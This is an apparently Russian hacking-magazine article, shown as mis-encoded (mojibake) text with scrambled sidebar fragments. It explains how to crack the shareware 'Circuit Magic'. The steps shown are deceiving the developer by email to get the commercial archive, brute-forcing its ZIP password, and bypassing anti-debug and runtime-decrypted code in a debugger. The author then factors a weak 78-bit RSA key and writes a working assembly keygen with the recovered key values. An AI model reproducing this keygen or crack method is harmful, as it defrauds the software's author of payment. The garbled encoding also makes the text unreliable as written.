full-âåðñèþ. ÊÀÏÅËÜÊÀ ÑÎÖÈÀËÜÍÎÉ ÈÍÆÅÍÅÐÈÈ Ãäå ìîæíî âçÿòü ïîëíóþ âåðñèþ ïðîãðàììû? Íàïðèìåð, íàéòè â Èíòåðíåòå, â ñåòÿõ E-Donkey èëè ó àâòîðà :). Åñòåñòâåííî, ãäå-íèáóäü ñêà÷àòü ïîëíóþ âåðñèþ íå óäàëîñü — ñëèøêîì ñïåöèôè÷åñêàÿ ïðîãðàììà, äà è âîîáùå ñîìíåâàþñü ÿ, ÷òî êòî-òî åå ïîêóïàë è ïîòîì ðåøèë ïîäåëèòüñÿ ñî âñåìè. Îñòàåòñÿ ñàì àâòîð. Ïîñîâåùàâøèñü, áûëî ðåøåíî ñûãðàòü íà ïðåñëîâóòîì ïóíêòå «Ðåãèñòðàöèÿ» â ìåíþ. Àâòîðó áûëî íàïðàâëåíî ïèñüìî ñëåäóþùåãî ñîäåðæàíèÿ (ñòèëü è îðôîãðàôèÿ àâòîðà ïèñüìà ñîõðàíåíû): «Çäðàâñòâóéòå! Ñêà÷àë Âàøó äåìî Circuit Magic — ïîíðàâèëàñü. Õî÷ó êóïèòü, íî ÷òî-òî íå ïîíÿë íè÷åãî: íàæèìàþ ðåãèñòðàöèÿ, à ïðîãðàììà àâàðèéíî çàêðûâàåòñÿ. Êóäà æå ÿ ââåäó ðåãèñòðàöèîííûé êîä? Ñ óâàæåíèåì, Àëåêñàíäð.»

064

Îòâåò íå çàñòàâèë ñåáÿ äîëãî æäàòü. Òàê êàê îí äîâîëüíî áîëüøîé ïî îáúåìó (íà ïîëîâèíó ñòàòüè), ïðèâîäèòü òóò ÿ åãî íå áóäó, îñòàíîâèìñÿ ëèøü íà îñíîâíûõ ìîìåíòàõ. Ñàìîå ãëàâíîå — ýòî ôðàçà «…Ïåðåä îïëàòîé ñêà÷àéòå àðõèâ êîììåð÷åñêîé âåðñèè ïðîãðàììû ñ àäðåñà http://.... Àðõèâ çàùèùåí ïàðîëåì. Ïàðîëü äëÿ ðàñïàêîâêè àðõèâà ñîîáùàåòñÿ ñðàçó ïîñëå ïîëó÷åíèÿ ïîäòâåðæäåíèÿ îïëàòû». Íó è äàëåå, ñîáñòâåííî, ïðî ðåãèñòðàöèþ — îòîñëàòü àâòîðó êîä êîìïüþòåðà, ñãåíåðèðîâàííûé ïðîãðàììîé ðåãèñòðàöèè, è ïîëó÷èòü îòâåòíûé ëèöåíçèîííûé êîä. Íå êàæåòñÿ âàì, ÷òî ñëèøêîì çàêðó÷åíî? Ñïåðâà îïëàòèòü ïðîãðàììó, ïîëó÷èòü ïàðîëü íà àðõèâ. Ðàçàðõèâèðîâàâ, ïîëó÷èòü êîä è òîëüêî ïîòîì àâòîð âûøëåò îòâåòíûé. Íó ÷òî æ, âñå ðàâíî ýòè ïåðåñûëêè êëþ÷åé, äåíåã è ïàðîëåé íå äëÿ íàñ, òàê êàê ó íàñ åñòü ïîëíàÿ âåðñèÿ. ÃÄÅ ÈÑÊÀÒÜ ÏÀÐÎËÈ ZIP? Äëÿ âîññòàíîâëåíèÿ çàáûòûõ ïàðîëåé ê àðõèâàì ñóùåñòâóåò äîâîëüíî ìíîãî óòèëèò. Íàâåðíîå, ñàìûå èçâåñòíûå èç íèõ — ýòî ïðîäóêòû îò êîìïàíèè ElcomSoft, ñïåöèàëèçèðóþùåéñÿ íà âûòàñêèâàíèè ïàðîëåé èç âñåãî, êóäà îíè áûëè ââåäåíû ðàíåå. Ìû áóäåì ïîëüçîâàòüñÿ ïàêåòîì Password Kit Enterprise v7.0, êîòîðûé ñîäåðæèò äîâîëüíî ìíîãî ðàçëè÷íûõ óòèëèò äëÿ ïîäáîðà ïàðîëåé, â òîì ÷èñëå è äëÿ àðõèâîâ ZIP. Ïîïóòíî ñëåäóåò îòìåòèòü, ÷òî ïîäáîð ïàðîëåé ê àðõèâàì ZIP çà÷àñòóþ ÿâëÿåòñÿ íå òàêèì óæ è äîëãèì, êàê ê ïðèìåðó ê àíàëîãè÷íîìó àðõèâó RAR. À óíèêàëüíàÿ âîçìîæíîñòü SureZip è âîîáùå äåëàåò ïîäîáíóþ çàùèòó ëåãêî ïðåîäîëèìîé. Ê ñîæàëåíèþ, îíà ðàáîòàåò òîëüêî ñ âåðñèÿìè WinZip 8.1 è íèæå, äà ê òîìó æå ôàéëîâ â àðõèâå äîëæíî áûòü íå ìåíüøå ïÿòè. Íî íàñ ýòî êàê ðàç óñòðàèâàåò: ôàéëîâ ó íàñ ìíîãî, à òàê êàê ïðîãðàììà ñòàðîâàòà, òî ÿâíî îíà áûëà çàïàêîâàíà íóæíîé íàì âåðñèåé. Çàïóñêàåì óòèëèòó ZipKey, âûáèðàåì SureZip â îïöèÿõ, óêàçûâàåì íàø àðõèâ è èäåì ïèòü ÷àé ñ áóòåðáðîäàìè. Äàëüøå áóäåò èíòåðåñíåå. ×åðåç íåñêîëüêî ìèíóò ïàðîëü íàéäåí. ÈÑÑËÅÄÎÂÀÍÈÅ ÏÐÎÃÐÀÌÌÛ Àðõèâ ðàñïàêîâàí, ìîæíî ñïîêîéíî óñòàíàâëèâàòü ïðîãðàììó. Òåïåðü ïðîãðàììà íå çàïóñêàåòñÿ âîîáùå. Çàòî ïîÿâèëñÿ íîâûé ôàéëèê — regcm.exe. Ýòî è åñòü ôàéë ðåãèñòðàöèè, ñäåëàí ñòîëü òîïîðíî, ÷òî ñðàçó íàòàëêèâàåò íà ìûñëü î ñïåøêå, â êîòîðîé àâòîð äåëàë ðåãèñòðàöèþ. Íà ðèñóíêå ìîæíî îöåíèòü ýòîò øåäåâðàëüíîå òâîðåíèå.

XÀÊÅÐ 01 /85/ 06


RSA-KEYS >

êîä, ðàñøèôðîâûâàåìûé âî âðåìÿ âûïîëíåíèÿ

â ëåâîé ÷àñòè êîä — ÄÎ çàïóñêà ïðîãðàììû, â ïðàâîé — ÏÎÑËÅ

øåäåâð usability: äèàëîã ðåãèñòðàöèè ïðîãðàììû

âçëîì ��àðîëÿ ê àðõèâó

Âñå â òî÷íîñòè, êàê è ïèñàë àâòîð. Ãåíåðèðóåòñÿ «êîä âàøåé ÝÂÌ», êîòîðûé íóæíî îòîñëàòü àâòîðó, â îòâåò íàäî ââåñòè ïðèñëàííûé êîä. Ìû ââîäèì ëþáûå öèôðû, íî ñîîáùåíèé íèêàêèõ íå âûäàåòñÿ. Ïðèäåòñÿ äîãàäûâàòüñÿ ñàìèì. Âàðèàíòîâ ìíîãî, ïîýòîìó ÿ ïðîñòî çàïóñòèë ïðîãðàììó — ïðîâåðèòü ÷òî áóäåò. Îäíàêî ïðîãà çàïóñòèëàñü ñ îøèáêîé, äà è ïðè íàæàòèè íà ëþáóþ èêîíêó îíà âûëåòàåò (òàì ãäå ðàíüøå áûëî ñîîáùåíèå î äåìîâåðñèè). Ïîíÿòíî, êîä-òî ó íàñ íåâåðíûé. Òåïåðü ìîæíî çàïóñêàòü ñâîè ëþáèìûå îòëàä÷èêè è äèçàññåìáëåðû. Ó ìåíÿ ýòî — OllyDbg è IDA, â äàëüíåéøåì âñþ ðàáîòó áóäåì ïðîâîäèòü â íèõ. Êîíå÷íî, íàø ëþáèìûé DeDe òîæå ìîæåò ïîìî÷ü. Áëàãî ïðîãðàììà íàïèñàíà íà Delphi è íè÷åì íå ïàêîâàíà (äîñòàòî÷íî ðåäêèé ñëó÷àé â íàøå âðåìÿ). Òàê êàê îøèáêà ïîÿâëÿåòñÿ ïîñëå ñïëåø-ôîðìû è äî îòêðûòèÿ îñíîâíîãî îêíà, òî ïîñòàâèì â îòëàä÷èêå áðÿê íà TForm1. Form Create. Àäðåñ 0091E050 íàì ïîäñêàæåò DeDe. Çàïóñòèâ ïðîãðàììó ïîä îòëàä÷èêîì è îñòàíîâèâøèñü â íóæíîì íàì ìåñòå, íåìíîãî ïîòðåéñèì êîä äî ïîÿâëåíèÿ îøèáêè, ïîïóòíî îòìå÷àÿ, ÷òî äåëàåò ïðîãðàììà, íî íå âäàâàÿñü â ïîäðîáíîñòè. Êàæåòñÿ, ÷òî ïðîãðàììà äåëàåò ñîâåðøåííî íå íóæíûå åé äåéñòâèÿ: ñ÷èòûâàåò ñåðèéíûå íîìåðà äèñêîâ, äàòó è âåðñèþ BIOS, ÷èòàåò íàø ââåäåííûé êîä èç ôàéëà ñheckSum.dat è äàæå ïðîâåðÿåò íàëè÷èå îòëàä÷èêà SoftIce.

XÀÊÅÐ 01 /85/ 06

0091EBF6 6A 00 0091EBF8 68 80000000 0091EBFD 6A 03 0091EBFF 6A 00 0091EC01 6A 03 0091EC03 68 000000C0 0091EC08 A1 18569300 DS:[935618] 0091EC0D 50 0091EC0E E8 1586EEFF <JMP.&kernel32.CreateFileA>

PUSH 0 PUSH 80 PUSH 3 PUSH 0 PUSH 3 PUSH MOV EAX,DWORD PTR CALL

PUSH EAX

×òî èíòåðåñíî, ýòîò êóñîê êîäà ðàñøèôðîâûâàåòñÿ âî âðåìÿ âûïîëíåíèÿ ïðîãðàììû, åñëè ïîñìîòðåòü ëèñòèíã â IDA, òî òàì áóäåò ñîâåðøåííî äðóãîé êîä. Íà ðèñóíêå â ëåâîé ÷àñòè íàõîäèòñÿ êîä ÄÎ çàïóñêà ïðîãðàììû, â ïðàâîé — ÏÎÑËÅ çàïóñêà. Ðàçíèöà î÷åâèäíà. Çíà÷èò, ìû íà âåðíîì ïóòè, åñëè àâòîð ðåøèë ýòó ÷àñòü ñêðûòü. Ïîýòîìó ïðèäåòñÿ çàïóñòèòü ïðîãðàììó, ÷òîáû ðàñêðèïòîâàëèñü âñå ó÷àñòêè, è èñïîëüçîâàòü ôóíêöèþ DeDe «Äàìïèòü àêòèâíûé ïðîöåññ». Îòìåòèì, ÷òî îøèáêà âûëåòàåò ïðè âûçîâå ïðîöåäóðû ïî àäðåñó 91F201:

êîä, íà êîòîðîì âûëåòàåò îøèáêà 0091F201 0091F207 0091F20C 0091F212 0091F215 0091F217 0091F219 0091F21B 0091F220

0091F223 0091F226 0091F22C 0091F231

MOV EAX,DWORD PTR SS:[EBP-128] CALL SuperSol.0091DF30 MOV ECX,DWORD PTR DS:[9378F8] CMP EDX,DWORD PTR DS:[ECX+4];\ JNZ SHORT SuperSol.0091F219; êëþ÷åâûå ñðàâíåíèÿ CMP EAX,DWORD PTR DS:[ECX]; / JE SHORT SuperSol.0091F220 CALL <SuperSol.@System@@Halt0$qqrv (00E4: C3)> MOV EDX,DWORD PTR SS:[EBP-8]

MOV EAX,DWORD PTR SS:[EBP-4] MOV EAX,DWORD PTR DS:[EAX+628] CALL SuperSol.0092E640 JMP SHORT SuperSol.0091F23D

ÆÅËÅÇÍÛÉ ÁÐßÊ Â ÅÀÕ ëåæèò óêàçàòåëü íà íàø ââåäåííûé íåïðàâèëüíûé êîä. Åñëè ïîñìîòðåòü ÷óòü íèæå, ñòàíåò î÷åâèäíî, ÷òî ïðîãðàììà íîðìàëüíî çàïóñòèòñÿ, åñëè óñïåøíî âûïîëíèòü ñðàâíåíèÿ ïî àäðå-

065


ÂÇËÎÌ ///// ISSUE

×ÒÎ ÒÀÊÎÅ RSA Íåìíîãî òåîðèè. Àëãîðèòì RSA íîñèò òàêîå íàçâàíèå áëàãîäàðÿ ñâîèì ñîçäàòåëÿì, ïî ïåðâûì áóêâàì èõ ôàìèëèé — Rivest, Shamir, Adleman.  íàñòîÿùåå âðåìÿ ýòî îäèí èç ñàìûõ ïîïóëÿðíûõ íåñèììåòðè÷íûõ êðèïòîàëãîðèòìîâ. Êëþ÷è øèôðîâàíèÿ âû÷èñëÿþòñÿ, êàê ôóíêöèè äâóõ áîëüøèõ ïðîñòûõ ÷èñåë, òî åñòü ÷èñåë, äåëÿùèõñÿ òîëüêî íà ñåáÿ è íà åäèíèöó. Ïðåäïîëàãàåòñÿ, ÷òî âîññòàíîâëåíèå èñõîäíîãî òåêñòà ïî øèôðîòåêñòó è çàêðûòîìó êëþ÷ó ýêâèâàëåíòíî ðàçëîæåíèþ íà ìíîæèòåëè äâóõ áîëüøèõ ÷èñåë. Èñïîëüçîâàíèå äîñòàòî÷íî áîëüøèõ ÷èñåë äåëàåò àëãîðèòì íàäåæíûì è êðèïòîñòîéêèì. Ôîðìèðîâàíèå îòêðûòîãî è çàêðûòîãî êëþ÷åé îïèñûâàåòñÿ ñëåäóþùèì àëãîðèòìîì: 1 Ôèêñèðóþòñÿ äâà ïðîñòûõ ÷èñëà p è q 2 Âû÷èñëÿåòñÿ èõ ïðîèçâåäåíèå n=p*q 3 Âûáèðàåòñÿ ÷èñëî e, ìåíüøåå n, ÿâëÿþùååñÿ âçàèìíî ïðîñòûì ñ ÷èñëîì (p-1)(q-1) 4 Ïî ìåòîäó Åâêëèäà ïîäáèðàþòñÿ öåëûå ÷èñëà d è y, óäîâëåòâîðÿþùèå óðàâíåíèþ e*d-1=(p-1)(q-1)*y 5 Ïàðà ÷èñåë (e,n) — ýòî îòêðûòûé êëþ÷, êîòîðûì øèôðóåòñÿ òåêñò 6 ×èñëî d — çàêðûòûé êëþ÷, îí õðàíèòüñÿ â ñåêðåòå; ñ åãî ïîìîùüþ ÷èòàþòñÿ âñå ñîîáùåíèÿ.

Ñ(1)=1^5 mod 21 = 1 C(2)=2^5 mod 21 = 11 C(3)=3^5 mod 21 = 12 C(4)=4^5 mod 21 = 16 C(5)=5^5 mod 21 = 17 Ïîëó÷èëàñü ïîñëåäîâàòåëüíîñòü C={1,11,12,16,17}. Ýòî è åñòü êðèïòîòåêñò. Äåøèôðîâàíèå ïðîâîäèòñÿ àíàëîãè÷íî øèôðîâàíèþ, òîëüêî ïðè ýòîì èñïîëüçóåòñÿ çàêðûòûé êëþ÷. Ïðè èñïîëüçîâàíèè äîñòàòî÷íî áîëüøèõ ÷èñåë äîñòèãàåòñÿ çíà÷èòåëüíàÿ êðèïòîñòîéêîñòü RSA. Åäèíñòâåííûé ñïîñîá âçëîìà ýòîãî àëãîðèòìà (òî åñòü íàõîæäåíèÿ çàêðûòîãî êëþ÷à) ÿâëÿåòñÿ òàê íàçûâàåìàÿ brute-force àòàêà, ïðîùå ãîâîðÿ, ìåòîä ïîñëåäîâàòåëüíîãî ïåðåáîðà. Îäíàêî ñðàçó ñòîèò çàìåòèòü, ÷òî ïðè äîñòàòî÷íî áîëüøèõ (ñâûøå 256 áàéò) âûáðàííûõ ÷èñëàõ ýòîò ïåðåáîð ìîæåò çàòÿíóòüñÿ íà äîëãèå-äîëãèå ãîäû. ÃÅÍÅÐÀÖÈß ÊËÞ×ÅÉ Â RSA

À: P ÄËß ÈÑË ÅÌ Õ × ÁÅÐÎÑÒÛ ÏÐ ÈQ

066

ßÅÌ ÈÅ: ÈÑË ÅÄÅÍ ÂÛ×ÎÈÇ ÏÐ P*Q N=

ñàì 91F212 è 91F219. Ñêîðåå âñåãî, ýòî ïðîñòî ñðàâíèâàþòñÿ äâà 64áèòíûõ ÷èñëà. Ñòàâèì hardware breakpoint íà àäðåñ 0091F201, òàê êàê îáû÷íûé breakpoint ïî F2 ïîñòàâèòü íå ïîëó÷èòñÿ — êîä-òî ðàñïàêîâûâàåòñÿ âî âðåìÿ âûïîëíåíèÿ. Âñòðå÷àþòñÿ òàêèå çàùèòû, òî÷íåå ìåòîäû ïðîòèâîäåéñòâèÿ îòëàäêè: îáû÷íûé áðÿê — ýòî íå ÷òî èíîå, êàê êîìàíäà int3, âñòàâëÿåìàÿ ïî àäðåñó óñòàíàâëèâàåìîãî áðÿêà. Ïðè âûïîëíåíèè ýòîé êîìàíäû îòëàä÷èê ñîîòâåòñòâóþùèì îáðàçîì åå îáðàáîòàåò, çàìåíèò íà îðèãèíàëüíóþ êîìàíäó è îñòàíîâèòñÿ — áðÿê ñðàáîòàåò.  íàøåì æå ñëó÷àå êîä ðàñøèôðîâûâàåòñÿ äèíàìè÷åñêè, òî åñòü âñòàâëåííàÿ îòëàä÷èêîì êîìàíäà int3 áóäåò ïðîñòî çàòåðòà. Ïåðåçàïóñòèì òåïåðü ïðîãðàììó ñ óñòàíîâëåííûì hardware breakpoint è ïîñëå îñòàíîâà ìîæåì ñïîêîéíî ñòàâèòü áðÿê íà àäðåñ 0091F20C (ñëåäóþùàÿ êîìàíäà ïîñëå íàéäåííîé ïðîöåäóðû), ÷òîáû ïîñìîòðåòü, ÷òî çà ÷èñëà ñðàâíèâàåò ïðîãðàììà ïåðåä âûõîäîì. Îäíèì èç òåõ äâóõ ÷èñåë îêàçûâàåòñÿ êîä ÝÂÌ, à âòîðîå, î÷åâèäíî, äåêîäèðóåòñÿ èç îòâåòíîãî êîäà. Íå çðÿ æå îí ïåðåäàåòñÿ â ïðîöåäóðó ïåðåä ñðàâíåíèåì. Ïîýòîìó ïîñìîòðèì íà ýòó ñàìóþ ïðîöåäóðó. Ïðè çàõîäå â íåå ñðàçó áðîñàþòñÿ â ãëàçà ñòðîêè 14162795658430266512815 è 188013097933370886974627. Äîïîëíèòåëüíóþ èíôîðìàöèþ îá RSA è øèôðîâàíèè ëó÷øå âñåãäà áðàòü èç êëàññè÷åñêèõ òðóäîâ. Íàïðèìåð, èçâåñòíîé êíèãè Áðþñà Øíàéåðà.

ÂÛÁÈÐÀÅÌ 0<E<N: Î ÅÑÒÜ ÊÎÄ(E,(P-1)*(Q-1)=1Ò ÐÎÑÒÛÅ ÝÒÈ ÷ÈÑËÀ - ÂÇÀÈÌÎÏ Ì ÅÒ Î ÄÎ Å ÊË ÈÄ ÐÀÂÅÍÑÌ À ÍÀ ÕÎÄÈ DÈ ÒÂÀ:E*D-1 Y ÈÇ =(P-1)(QÌ -1)*Y ÏÀÐÀ (E,N) —Î Ò Ê ×È Ð Û ÒÛÉ Ñ Ë ÎD ÊËÞ —Ç × ÀÊÐ Û Ò ÛÉ ÊËÞ ×

Ïðè øèôðîâàíèè èñõîäíûé òåêñò ðàññìàòðèâàåòñÿ êàê ÷èñëîâîé ðÿä, è íàä êàæäûì åãî ÷èñëîì ñîâåðøàåòñÿ îïåðàöèÿ Ñ(i)=(M[i]^e) mod n. Áîëåå ïîäðîáíî ïðî àëãîðèòì RSA, à òàêæå ìíîãèõ äðóãèõ ìîæíî ïðî÷èòàòü â êíèãå èçâåñòíîãî ñïåöèàëèñòà â êðèïòîãðàôè÷åñêîé íàóêå Áðþñà Øíàéåðà «Ïðèêëàäíàÿ êðèïòîãðàôèÿ», ïåðåâåäåííîé íà ðóññêèé ÿçûê. À ìû ïîêà ðàçáåðåì ðàáîòó àëãîðèòìà RSA íà î÷åíü ïðîñòîì ïðèìåðå. Âûáåðåì p=3, q=7 — äâà âçàèìíî ïðîñòûõ ÷èñëà, ïðàâäà, ìàëåíüêèõ, íî ýòî íàì íóæíî òîëüêî äëÿ ðàçáîðà ðàáîòû àëãîðèòìà. Ñîîòâåòñòâåííî, n áóäåò ðàâíî 21 (3*7). Óñòàíîâèì e=5 — âçàèìíî ïðîñòîå ñ ðåçóëüòàòîì (3-1)*(7-1)=12. Òîãäà îòûñêàòü íåñêîëüêî ïàð (d,y) íåñëîæíî: ê ïðèìåðó, (5,2) èëè (17,7). Ìû äëÿ èíòåðåñà âîçüìåì âòîðóþ ïàðó. Çàêðûòûé êëþ÷ â ýòîì ñëó÷àå áóäåò ÷èñëîì 17, à îòêðûòûé — ïàðîé ÷èñåë (5,21). Âîçüìåì ïîñëåäîâàòåëüíîñòü M={1,2,3,4,5} è çàøèôðóåì åå ñ ïîìîùüþ îòêðûòîãî êëþ÷à:

Ïåðâàÿ ìûñëü ïðè èõ âèäå — RSA. Çàãëÿíóâ âíóòðü ïðîöåäóðû 885A2C, âñå ñîìíåíèÿ èñ÷åçëè. Ýòî ñòàðàÿ äîáðàÿ ðåàëèçàöèÿ RSA èç êàêîãî-òî ïîïóëÿðíîãî ñðåäè ïðîãðàììèñòîâ-øàðîâàðùèêîâ äåëôè-êîìïîíåíòà. Îïèñàíèå àëãîðèòìà øèôðîâàíèÿ RSA ïðèâåäåíî â ñîîòâåòñòâóþùåé âðåçêå, íàñòîÿòåëüíî ðåêîìåíäóþ òåáå îçíàêîìèòüñÿ ñ íèì, òàê êàê ýòî íóæíî äëÿ ïîíèìàíèÿ òîãî, î ÷åì ÿ áóäó ãîâîðèòü. À ìû ñåé÷àñ ïðîäîëæèì âçëîì ïðîãðàììû. Ïðåæäå âñåãî äàâàé îïðåäåëèìñÿ ñ òåì, êàêèå èíñòðóìåíòû äëÿ ðàáîòû ñ àëãîðèòìîì RSA ó íàñ åñòü? Ìû áóäåì èñïîëüçîâàòü äâå óòèëèòû — RSA-Tool è BigInt Calculator Pro. Ñêà÷àòü èõ ìîæíî ñ ñàéòà http://cracklab.ru. Ïåðâàÿ, êðîìå ãåíåðàöèè áîëüøèõ ïðîñòûõ ÷èñåë, îòêðûòûõ è çàêðûòûõ êëþ÷åé, øèôðîâàíèÿ è äåøèôðîâàíèÿ, òàêæå ìîæåò ïî èçâåñòíîìó ÷èñëó n ðàñêëàäûâàòü åãî íà p è q è âû÷èñëÿòü d. Îïÿòü æå íàïîìíþ, ÷òî ñðîêè âû÷èñëåíèÿ (÷èòàé — ïîäáîðà) çàâèñÿò îò äëèíû èñïîëüçóåìûõ êëþ÷åé. Âòîðàÿ óòèëèòà ïðîèçâîäèò ìàòåìàòè÷åñêèå îïåðàöèè ñ î÷åíü áîëüøèìè ÷èñëàìè, à òàêæå èìååò â ñâîåì ñîñòàâå ìîäóëü RSA.  íåì ìû áóäåì ïðîâåðÿòü íàéäåííûå ðåøåíèÿ. ÂÛ×ÈÑËÅÍÈÅ ËÈÖÅÍÇÈÎÍÍÎÃÎ ÊÎÄÀ Äëÿ íà÷àëà ïðîâåðèì ðàáîòó RSA ñ ïîìîùüþ RSA-Tool (îíà ïîçâîëÿåò ðàáîòàòü ñ äåñÿòè÷íûìè ÷èñëàìè) íà ïðèìåðå îò Áðþñà Øíàéåðà: n=3337, p=47, q=71, e=79, d=1019. Ñïåðâà ââåäåì n, æìåì Exact size. Ïîëó÷èì ðàçìåð êëþ÷à — 12 áèò, ââåäåì åãî â ïîëå KeySize.

XÀÊÅÐ 01 /85/ 06


Äëÿ íàõîæäåíèÿ p è q ôàêòîðèçóåì n (Factor N). Ïîëó÷èì 47 è 71. Äëÿ íàõîæäåíèÿ d íàäî ââåñòè âûáðàííóþ e â øåñòíàäöàòåðè÷íîì âèäå è íàæàòü Calc D. d=1019 — âñå òî÷íî, êàê â ïðèìåðå. Âåðíåìñÿ ê íàøåé ïðîãðàììå. Ñïåðâà ðàçáåðåìñÿ, ÷òî çà ñòðîêè 14162795658430266512815 è 188013097933370886974627? Ìû óæå ðàçîáðàëèñü, ÷òî îòêðûòûé êëþ÷ äîëæåí ñîñòîÿòü èç äâóõ ÷èñåë — n è e. Êàêîå æå èç ýòèõ äâóõ ÷èñåë n, à êàêîå — e? RSA-Tool íàì âñå ðàññêàæåò, ê òîìó óæå ÷èñëà äîâîëüíî ìàëåíüêèå (äëÿ êðèïòîñòîéêîãî RSA). Äëÿ íà÷àëà ìîæíî ïîïðîáîâàòü ôàêòîðèçîâàòü ïåðâîå ÷èñëî (âñå, êàê â ïðèìåðå). Íå âûøëî? Ïðîáóåì âòîðîå. À âòîðîå ïðåêðàñíî ðàçëîæèëîñü íà äâà ñîìíîæèòåëÿ. Ñëåäîâàòåëüíî, ïåðâîå ÷èñëî — ýòî e. Ðàçìåð êëþ÷à — 78 áèò, çíà÷èò, ó íàñ RSA-78. Íàäî â ïîëå E ââåñòè ïåðâîå ÷èñëî, íå çàáûâ ïåðåâåñòè åãî â øåñòíàäöàòåðè÷íûé âèä. Íàæàâ Calc D, ìû íàõîäèì íåäîñòàþùåå ÷èñëî — 1113439. Çäåñü íåîáõîäèìî îòìåòèòü, ÷òî íà ñàìîì äåëå ïîëó÷èëîñü âñå íàîáîðîò: íàì áûëî çàðàíåå èçâåñòíî ÷èñëî d, à íàõîäèëè ìû e. Äåëî â òîì, ÷òî, ñ ìàòåìàòè÷åñêîé òî÷êè çðåíèÿ, ÷èñëà d è e ðàâíîçíà÷íû, òî åñòü ìîæíî øèôðîâàòü ñ ïîìîùüþ d, ðàñøèôðîâûâàòü — ñ ïîìîùüþ å, è íàîáîðîò. Ïðàêòè÷åñêîé ðàçíèöû âûáîð ÷èñëà äëÿ øèôðîâàíèÿ íå èìååò. ×òî ìû ïîëó÷èëè â èòîãå è äëÿ ÷åãî âñå ýòî áûëî èçó÷åíî è ïðîäåëàíî? Ïîëó÷àåòñÿ, ÷òî ïðîãðàììà äåêîä��ðóåò ââåäåííûé îòâåòíûé êîä ïî àëãîðèòìó RSA, à çíà÷èò, äëÿ ïîëó÷åíèÿ ïðàâèëüíîãî êîäà íóæíî çàêîäèðîâàòü «êîä ÝÂÌ». Íî åñòü íåáîëüøàÿ äåòàëü — ýòîìó äåëôè-êîìïîíåíòó íóæíî, ÷òîáû ïåðâûé áàéò äåêîäèðîâàííîãî ÷èñëà áûë 07, òîãäà îí îòáðàñûâàåòñÿ è ïîëó÷àåòñÿ íóæíîå ÷èñëî. Òàêîé óæ ñòðàííûé çàìûñåë áûë ó åãî ðàçðàáîò÷èêîâ. Çíà÷èò, àëãîðèòì íàøèõ äàëüíåéøèõ äåéñòâèé òàêîé: 1 Ïðåîáðàçîâàòü «êîä ÝÂÌ» â øåñòíàäöàòåðè÷íóþ ñèñòåìó 2 Äîáàâèòü â íà÷àëî 07. 3 Ñäåëàòü RSA_EnCrypt. 4 Ïðåîáðàçîâàòü ðåçóëüòàò â äåñÿòè÷íóþ ñèñòåìó. Äëÿ âû÷èñëåíèé âîñïîëüçóåìñÿ êàëüêóëÿòîðîì BigInt Calculator, òî÷íåå åãî ìîäóëåì RSATool. Ïåðåâåäåì âñå íàéäåííûå ÷èñëà â øåñòíàäöàòåðè÷íóþ ñèñòåìó è ââåäåì â ñîîòâåòñòâóþùèå îêíà RSATool. Îñòàåòñÿ ââåñòè «êîä ÝÂÌ» â øåñòíàäöàòåðè÷íîì âèäå ñ äîáàâëåííûì «07» â îêîøêî Encrypt&Decrypt test è íàæàòü Encrypt. Ïîëó÷èì íàø ñåðèéíûé íîìåð. Ïåðåâîäèì åãî â äåñÿòè÷íûé âèä, ââîäèì â regcm.exe, è ïðîãðàììà çàïóñêàåòñÿ áåç âîïðîñîâ. ÏÈØÅÌ ÊÅÉÃÅÍ Íàïèñàíèå êåéãåíà äëÿ RSA ìîæåò ïîêàçàòüñÿ äåëîì ÷ðåçâû÷àéíî òðóäíûì, îäíàêî ýòî íå ñîâñåì òàê. Åñòü ìíîãî ãîòîâûõ áèáëèîòåê äëÿ ðàáîòû ñ áîëüøèìè ÷èñëàìè, íàïðèìåð, áèáëèîòåêà biglib v. 0.01e by roy|fleur. Åå ìû è áóäåì èñïîëüçîâàòü. Ïèñàòü áóäåì, êîíå÷íî, íà àññåìáëåðå, èñïîëüçóÿ ïðàêòè÷åñêè ëþáîé åãî êîìïèëÿòîð. Âîò îñíîâíàÿ ÷àñòü íàøåãî êåéãåíà:

êîä íàøåãî êåéãåíà .data E db "10FD5F",0 Ndb "27D035E0D250C4F3ECA3",0 .code KgProc proc hWin:HWND LOCAL big_n: DWORD LOCAL big_e: DWORD LOCAL big_c: DWORD LOCAL big_m: DWORD invoke GetDlgItemText,hWin,1002,addr sID,20h .if eax invoke RtlZeroMemory,addr sSerial,sizeof M+sizeof sSerial invoke _BigCreate,0 ;Èíèöèàëèçàöèÿ mov big_n,eax invoke _BigCreate,0 mov big_e,eax invoke _BigCreate,0 mov big_c,eax

XÀÊÅÐ 01 /85/ 06

èñïîëüçîâàíèå RSATool

ïðîãðàììà BigInt ïîìîãëà

íàì ñ âû÷èñëåíèÿìè invoke _BigCreate,0 mov big_m,eax invoke _BigIn,addr N,10h,big_n invoke _BigIn,addr E,10h,big_e mov eax,offset sID mov edx,offset sTmp call str2int64 ; êîíâåðòèðóåì â 64-áèòíîå ÷èñëî, âçÿòî èç Delphi bswap eax bswap edx mov dword ptr [M],edx mov dword ptr [M+4],eax mov edi,offset M ;Ôîðìèðîâàíèå M xor eax,eax mov ecx,8 repz scasb add edi,-2 mov byte ptr [edi],7 invoke _BigInBytes,offset M,8,256,big_m invoke _BigPowMod,big_m,big_e,big_n,big_c ;Êîäèðîâàíèå invoke _BigOut,big_c,10,addr sSerial ;Ïðåîáðàçîâàíèå â 10÷íóþ ñòðîêó invoke _BigDestroy,big_n ;Äåèíèöèàëèçàöèÿ invoke _BigDestroy,big_e invoke _BigDestroy,big_c invoke _BigDestroy,big_m invoke SetDlgItemText,hWin,1003,addr sSerial .else invoke SetDlgItemText,hWin,1003,addr sShortName .endif ret

KgProc endp Îñíîâà êåéãåíà ãîòîâà, èíòåðôåéñ è îôîðìëåíèå äîáàâèøü ñàì. ÇÀÊËÞ×ÅÍÈÅ Íåîáõîäèìî îòìåòèòü, ÷òî íàì óäàëîñü íàïèñàíèå êåéãåíà äëÿ ýòîé ïðîãðàììû áëàãîäàðÿ îøèáêàì àâòîðà ïðè âûáîðå êëþ÷åé, òî÷íåå èõ äëèí. Ïðè âûáîðå äîñòàòî÷íî áîëüøèõ êëþ÷åé âçëîì áû çàòÿíóëñÿ íà íåñêîëüêî ëåò. Õîòÿ íåò, íå âçëîì, à ïîèñê âåðíîãî ñåðèéíîãî íîìåðà. Âñåãäà æå åñòü äðóãèå ñïîñîáû âçëîìà, íàïðèìåð, ïàò÷ òåõ ïåðåõîäîâ, ïåðåä êîòîðûìè ñðàâíèâàþòñÿ äâà 64-áèòíûõ ÷èñëà (àäðåñ 0091F20C, ê ïðèìåðó). Èëè ïîäñòàíîâêà íóæíûõ çíà÷åíèé â ñðàâíèâàåìûå ðåãèñòðû. 